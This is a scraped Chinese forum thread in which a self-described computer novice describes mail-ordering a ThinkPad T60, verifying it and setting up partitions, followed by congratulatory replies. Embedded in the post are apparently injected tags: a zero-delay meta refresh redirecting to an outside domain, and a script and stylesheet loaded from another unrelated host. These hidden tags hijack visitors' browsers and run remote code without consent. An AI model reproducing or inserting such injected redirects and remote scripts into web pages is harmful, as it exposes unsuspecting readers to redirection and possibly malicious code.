开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 邮购历程+照片

哈哈,就在今早我终于收到了 我的T60 DN6,那叫一个开心阿::85:: 。。。  箱子却比我想象的要轻很多,刚开始我还以为搞错了呢,而且XY还是用了两个箱子。我迫不及待就打开了箱子,BB比我现在用的Asus要小要轻,拿在手里感觉很舒服,按照帖子里的验机步骤我先是验了序列号,充电次数,CPU...,之后就开始做隐藏分区。其实我是个地地道道的电脑盲,平时用电脑主要就是上上网,查查资料,听听音乐,装系统这种事对于我来说真的不是很简单的,幸好有Xy的帖子和QQ上XY热心的工作人员对我的指点,我才紧紧张张地开始做隐藏分区,两个多小时后终于顺利完成了隐藏分区,真是捏了一把汗::78:: ,呵呵,还真有点佩服自己::71:: 。可是问题又来了,本来的4个盘在做完隐藏分区之后就只有C盘了,那就只好重新分区了,结果分了两次才成功。现在,我BB已经在顺利使用了::67:: ,真的很不容易啊::69::

回想在购机之前真的是顾虑重重:1,路途遥远选择邮购。  2,不能亲自验机。3,对IBM还很陌生而且自己又是电脑盲。4,售后服务。反正是能担心的都担心了::65:: ,不过经过一段时间的观察和思考,再加上XDJM的支持,最终这些顾虑都烟消云散了,因为我相信大家的选择是正确的::84:: 。

+300---tszmsid

<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

tszmsid + 300

好像应该发评测区吧?还可以加xb。
呵呵呵 同喜阿
不错,很实在!
恭喜了
呵呵  进步挺快的 一学就会
恭喜
你好,可以认识一下吗
恭喜
请问搂主的FN键,按下去是不是比其他的键响一些?有点“滋滋”,稍刺耳的声音。
恭喜楼主
羡慕啊
恭喜,哪有做隐藏分区的帖子呢
恭喜啊!羡慕啊!
恭喜LZ,下次发点使用体会~~~
我也想邮购啊~~怕怕~~
好手记,恭喜。。。
电脑盲竟然还用那么专业的手机!
挺厉害 恭喜LZ已经不是电脑盲了
现在是忙电脑了
祝贺一下
原帖由 bobo311 于 2007-3-8 09:01 发表
请问搂主的FN键,按下去是不是比其他的键响一些?有点“滋滋”,稍刺耳的声音。

没发现阿
开心就好,大家同你一起分享快乐。